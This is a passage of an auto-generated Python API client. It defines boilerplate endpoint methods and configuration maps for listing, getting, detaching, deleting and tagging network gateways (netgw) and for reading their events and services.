netgw_id (str): Netgw Id
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['project_id'] = \
project_id
kwargs['location_id'] = \
location_id
kwargs['netgw_id'] = \
netgw_id
return self.call_with_http_info(**kwargs)
self.networking_project_netgw_delete = _Endpoint(
settings={
'response_type': None,
'auth': [
'BearerAuth'
],
'endpoint_path': '/networking/{locationId}/project/{projectId}/netgw/{netgwId}',
'operation_id': 'networking_project_netgw_delete',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
'project_id',
'location_id',
'netgw_id',
],
'required': [
'project_id',
'location_id',
'netgw_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'project_id':
(str,),
'location_id':
(str,),
'netgw_id':
(str,),
},
'attribute_map': {
'project_id': 'projectId',
'location_id': 'locationId',
'netgw_id': 'netgwId',
},
'location_map': {
'project_id': 'path',
'location_id': 'path',
'netgw_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__networking_project_netgw_delete
)
def __networking_project_netgw_detach(
self,
project_id,
location_id,
netgw_id,
**kwargs
):
"""Detach networking/netgw # noqa: E501
action detach # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.networking_project_netgw_detach(project_id, location_id, netgw_id, async_req=True)
>>> result = thread.get()
Args:
project_id (str): Project Id
location_id (str): Location Id
netgw_id (str): Netgw Id
Keyword Args:
x_idempotency_key (str): Idempotency key. [optional]
x_dry_run (str): Dry run. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Netgw
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['project_id'] = \
project_id
kwargs['location_id'] = \
location_id
kwargs['netgw_id'] = \
netgw_id
return self.call_with_http_info(**kwargs)
self.networking_project_netgw_detach = _Endpoint(
settings={
'response_type': (Netgw,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/networking/{locationId}/project/{projectId}/netgw/{netgwId}/actions/detach',
'operation_id': 'networking_project_netgw_detach',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'project_id',
'location_id',
'netgw_id',
'x_idempotency_key',
'x_dry_run',
],
'required': [
'project_id',
'location_id',
'netgw_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'project_id':
(str,),
'location_id':
(str,),
'netgw_id':
(str,),
'x_idempotency_key':
(str,),
'x_dry_run':
(str,),
},
'attribute_map': {
'project_id': 'projectId',
'location_id': 'locationId',
'netgw_id': 'netgwId',
'x_idempotency_key': 'x-idempotency-key',
'x_dry_run': 'x-dry-run',
},
'location_map': {
'project_id': 'path',
'location_id': 'path',
'netgw_id': 'path',
'x_idempotency_key': 'header',
'x_dry_run': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__networking_project_netgw_detach
)
def __networking_project_netgw_event_get(
self,
project_id,
location_id,
netgw_id,
event_id,
**kwargs
):
"""Get networking/netgw.event # noqa: E501
Get networking/netgw.event # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.networking_project_netgw_event_get(project_id, location_id, netgw_id, event_id, async_req=True)
>>> result = thread.get()
Args:
project_id (str): Project Id
location_id (str): Location Id
netgw_id (str): Netgw Id
event_id (str): eventId
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Event
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['project_id'] = \
project_id
kwargs['location_id'] = \
location_id
kwargs['netgw_id'] = \
netgw_id
kwargs['event_id'] = \
event_id
return self.call_with_http_info(**kwargs)
self.networking_project_netgw_event_get = _Endpoint(
settings={
'response_type': (Event,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/networking/{locationId}/project/{projectId}/netgw/{netgwId}/event/{eventId}',
'operation_id': 'networking_project_netgw_event_get',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'project_id',
'location_id',
'netgw_id',
'event_id',
],
'required': [
'project_id',
'location_id',
'netgw_id',
'event_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'project_id':
(str,),
'location_id':
(str,),
'netgw_id':
(str,),
'event_id':
(str,),
},
'attribute_map': {
'project_id': 'projectId',
'location_id': 'locationId',
'netgw_id': 'netgwId',
'event_id': 'eventId',
},
'location_map': {
'project_id': 'path',
'location_id': 'path',
'netgw_id': 'path',
'event_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__networking_project_netgw_event_get
)
def __networking_project_netgw_event_list(
self,
project_id,
location_id,
netgw_id,
**kwargs
):
"""List networking/netgw.event # noqa: E501
List networking/netgw.event # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.networking_project_netgw_event_list(project_id, location_id, netgw_id, async_req=True)
>>> result = thread.get()
Args:
project_id (str): Project Id
location_id (str): Location Id
netgw_id (str): Netgw Id
Keyword Args:
limit (float): $limit. [optional] if omitted the server will use the default value of 100
skip (float): $skip. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[Event]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['project_id'] = \
project_id
kwargs['location_id'] = \
location_id
kwargs['netgw_id'] = \
netgw_id
return self.call_with_http_info(**kwargs)
self.networking_project_netgw_event_list = _Endpoint(
settings={
'response_type': ([Event],),
'auth': [
'BearerAuth'
],
'endpoint_path': '/networking/{locationId}/project/{projectId}/netgw/{netgwId}/event',
'operation_id': 'networking_project_netgw_event_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'project_id',
'location_id',
'netgw_id',
'limit',
'skip',
],
'required': [
'project_id',
'location_id',
'netgw_id',
],
'nullable': [
],
'enum': [
],
'validation': [
'limit',
]
},
root_map={
'validations': {
('limit',): {
'inclusive_maximum': 1000,
'inclusive_minimum': 1,
},
},
'allowed_values': {
},
'openapi_types': {
'project_id':
(str,),
'location_id':
(str,),
'netgw_id':
(str,),
'limit':
(float,),
'skip':
(float,),
},
'attribute_map': {
'project_id': 'projectId',
'location_id': 'locationId',
'netgw_id': 'netgwId',
'limit': '$limit',
'skip': '$skip',
},
'location_map': {
'project_id': 'path',
'location_id': 'path',
'netgw_id': 'path',
'limit': 'query',
'skip': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__networking_project_netgw_event_list
)
def __networking_project_netgw_get(
self,
project_id,
location_id,
netgw_id,
**kwargs
):
"""Get networking/netgw # noqa: E501
Returns a single netgw # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.networking_project_netgw_get(project_id, location_id, netgw_id, async_req=True)
>>> result = thread.get()
Args:
project_id (str): Project Id
location_id (str): Location Id
netgw_id (str): Netgw Id
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Netgw
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['project_id'] = \
project_id
kwargs['location_id'] = \
location_id
kwargs['netgw_id'] = \
netgw_id
return self.call_with_http_info(**kwargs)
self.networking_project_netgw_get = _Endpoint(
settings={
'response_type': (Netgw,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/networking/{locationId}/project/{projectId}/netgw/{netgwId}',
'operation_id': 'networking_project_netgw_get',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'project_id',
'location_id',
'netgw_id',
],
'required': [
'project_id',
'location_id',
'netgw_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'project_id':
(str,),
'location_id':
(str,),
'netgw_id':
(str,),
},
'attribute_map': {
'project_id': 'projectId',
'location_id': 'locationId',
'netgw_id': 'netgwId',
},
'location_map': {
'project_id': 'path',
'location_id': 'path',
'netgw_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__networking_project_netgw_get
)
def __networking_project_netgw_list(
self,
project_id,
location_id,
**kwargs
):
"""List networking/netgw # noqa: E501
List netgw # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.networking_project_netgw_list(project_id, location_id, async_req=True)
>>> result = thread.get()
Args:
project_id (str): Project Id
location_id (str): Location Id
Keyword Args:
name (str): Filter by name. [optional]
tag_value (str): Filter by tag.value. [optional]
tag_key (str): Filter by tag.key. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[Netgw]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['project_id'] = \
project_id
kwargs['location_id'] = \
location_id
return self.call_with_http_info(**kwargs)
self.networking_project_netgw_list = _Endpoint(
settings={
'response_type': ([Netgw],),
'auth': [
'BearerAuth'
],
'endpoint_path': '/networking/{locationId}/project/{projectId}/netgw',
'operation_id': 'networking_project_netgw_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'project_id',
'location_id',
'name',
'tag_value',
'tag_key',
],
'required': [
'project_id',
'location_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'project_id':
(str,),
'location_id':
(str,),
'name':
(str,),
'tag_value':
(str,),
'tag_key':
(str,),
},
'attribute_map': {
'project_id': 'projectId',
'location_id': 'locationId',
'name': 'name',
'tag_value': 'tag.value',
'tag_key': 'tag.key',
},
'location_map': {
'project_id': 'path',
'location_id': 'path',
'name': 'query',
'tag_value': 'query',
'tag_key': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__networking_project_netgw_list
)
def __networking_project_netgw_service_get(
self,
project_id,
location_id,
netgw_id,
service_id,
**kwargs
):
"""Get networking/netgw.service # noqa: E501
Get networking/netgw.service # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.networking_project_netgw_service_get(project_id, location_id, netgw_id, service_id, async_req=True)
>>> result = thread.get()
Args:
project_id (str): Project Id
location_id (str): Location Id
netgw_id (str): Netgw Id
service_id (str): serviceId
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
ResourceService
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['project_id'] = \
project_id
kwargs['location_id'] = \
location_id
kwargs['netgw_id'] = \
netgw_id
kwargs['service_id'] = \
service_id
return self.call_with_http_info(**kwargs)
self.networking_project_netgw_service_get = _Endpoint(
settings={
'response_type': (ResourceService,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/networking/{locationId}/project/{projectId}/netgw/{netgwId}/service/{serviceId}',
'operation_id': 'networking_project_netgw_service_get',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'project_id',
'location_id',
'netgw_id',
'service_id',
],
'required': [
'project_id',
'location_id',
'netgw_id',
'service_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'project_id':
(str,),
'location_id':
(str,),
'netgw_id':
(str,),
'service_id':
(str,),
},
'attribute_map': {
'project_id': 'projectId',
'location_id': 'locationId',
'netgw_id': 'netgwId',
'service_id': 'serviceId',
},
'location_map': {
'project_id': 'path',
'location_id': 'path',
'netgw_id': 'path',
'service_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__networking_project_netgw_service_get
)
def __networking_project_netgw_service_list(
self,
project_id,
location_id,
netgw_id,
**kwargs
):
"""List networking/netgw.service # noqa: E501
List networking/netgw.service # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.networking_project_netgw_service_list(project_id, location_id, netgw_id, async_req=True)
>>> result = thread.get()
Args:
project_id (str): Project Id
location_id (str): Location Id
netgw_id (str): Netgw Id
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[ResourceService]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['project_id'] = \
project_id
kwargs['location_id'] = \
location_id
kwargs['netgw_id'] = \
netgw_id
return self.call_with_http_info(**kwargs)
self.networking_project_netgw_service_list = _Endpoint(
settings={
'response_type': ([ResourceService],),
'auth': [
'BearerAuth'
],
'endpoint_path': '/networking/{locationId}/project/{projectId}/netgw/{netgwId}/service',
'operation_id': 'networking_project_netgw_service_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'project_id',
'location_id',
'netgw_id',
],
'required': [
'project_id',
'location_id',
'netgw_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'project_id':
(str,),
'location_id':
(str,),
'netgw_id':
(str,),
},
'attribute_map': {
'project_id': 'projectId',
'location_id': 'locationId',
'netgw_id': 'netgwId',
},
'location_map': {
'project_id': 'path',
'location_id': 'path',
'netgw_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__networking_project_netgw_service_list
)
def __networking_project_netgw_tag_create(
self,
project_id,
location_id,
netgw_id,
tag,
**kwargs
):
"""Create networking/netgw.tag # noqa: E501
Create networking/netgw.tag # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.networking_project_netgw_tag_create(project_id, location_id, netgw_id, tag, async_req=True)
>>> result = thread.get()
Args:
project_id (str): Project Id
location_id (str): Location Id
netgw_id (str): Netgw Id
tag (Tag):
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Tag
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['project_id'] = \
project_id
kwargs['location_id'] = \
location_id
kwargs['netgw_id'] = \
netgw_id
kwargs['tag'] = \
tag
return self.call_with_http_info(**kwargs)
self.networking_project_netgw_tag_create = _Endpoint(
settings={
'response_type': (Tag,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/networking/{locationId}/project/{projectId}/netgw/{netgwId}/tag',
'operation_id': 'networking_project_netgw_tag_create',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'project_id',
'location_id',
'netgw_id',
'tag',
],
'required': [
'project_id',
'location_id',
'netgw_id',
'tag',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'project_id':
(str,),
'location_id':
(str,),
'netgw_id':
(str,),
'tag':
(Tag,),
},
'attribute_map': {
'project_id': 'projectId',
'location_id': 'locationId',
'netgw_id': 'netgwId',
},
'location_map': {
'project_id': 'path',
'location_id': 'path',
'netgw_id': 'path',
'tag': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__networking_project_netgw_tag_create
)
def __networking_project_netgw_tag_delete(
self,
project_id,
location_id,
netgw_id,
tag_id,
**kwargs
):
"""Delete networking/netgw.tag # noqa: E501
Delete networking/netgw.tag # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.networking_project_netgw_tag_delete(project_id, location_id, netgw_id, tag_id, async_req=True)
>>> result = thread.get()
Args:
project_id (str): Project Id
location_id (str): Location Id
netgw_id (str): Netgw Id
tag_id (str): tagId
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['project_id'] = \
project_id
kwargs['location_id'] = \
location_id
kwargs['netgw_id'] = \
netgw_id
kwargs['tag_id'] = \
tag_id
return self.call_with_http_info(**kwargs)
self.networking_project_netgw_tag_delete = _Endpoint(
settings={
'response_type': None,
'auth': [
'BearerAuth'
],
'endpoint_path': '/networking/{locationId}/project/{projectId}/netgw/{netgwId}/tag/{tagId}',
'operation_id': 'networking_project_netgw_tag_delete',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
'project_id',
'location_id',
'netgw_id',
'tag_id',
],
'required': [
'project_id',
'location_id',
'netgw_id',
'tag_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'project_id':
(str,),
'location_id':
(str,),
'netgw_id':
(str,),
'tag_id':
(str,),
},
'attribute_map': {
'project_id': 'projectId',
'location_id': 'locationId',
'netgw_id': 'netgwId',
'tag_id': 'tagId',
},
'location_map': {
'project_id': 'path',
'location_id': 'path',
'netgw_id': 'path',
'tag_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__networking_project_netgw_tag_delete
)
def __networking_project_netgw_tag_get(
self,
project_id,
location_id,
netgw_id,
tag_id,
**kwargs
):
"""Get networking/netgw.tag # noqa: E501
Get networking/netgw.tag # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.networking_project_netgw_tag_get(project_id, location_id, netgw_id, tag_id, async_req=True)
>>> result = thread.get()
Args:
project_id (str): Project Id
location_id (str): Location Id
netgw_id (str): Netgw Id
tag_id (str): tagId
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Tag
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['project_id'] = \
project_id
kwargs['location_id'] = \
location_id
kwargs['netgw_id'] = \
netgw_id
kwargs['tag_id'] = \
tag_id
return self.call_with_http_info(**kwargs)
self.networking_project_netgw_tag_get = _Endpoint(
settings={
'response_type': (Tag,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/networking/{locationId}/project/{projectId}/netgw/{netgwId}/tag/{tagId}',
'operation_id': 'networking_project_netgw_tag_get',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'project_id',
'location_id',
'netgw_id',
'tag_id',
],
'required': [
'project_id',
'location_id',
'netgw_id',
'tag_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'project_id':
(str,),
'location_id':
(str,),
'netgw_id':
(str,),
'tag_id':
(str,),
},
'attribute_map': {
'project_id': 'projectId',
'location_id': 'locationId',
'netgw_id': 'netgwId',
'tag_id': 'tagId',
},
'location_map': {
'project_id': 'path',
'location_id': 'path',
'netgw_id': 'path',
'tag_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__networking_project_netgw_tag_get
)
def __networking_project_netgw_tag_list(
self,
project_id,
location_id,
netgw_id,
**kwargs
):
"""List networking/netgw.tag # noqa: E501
List networking/netgw.tag # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.networking_project_netgw_tag_list(project_id, location_id, netgw_id, async_req=True)
>>> result = thread.get()
Args:
project_id (str): Project Id
location_id (str): Location Id
netgw_id (str): Netgw Id
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
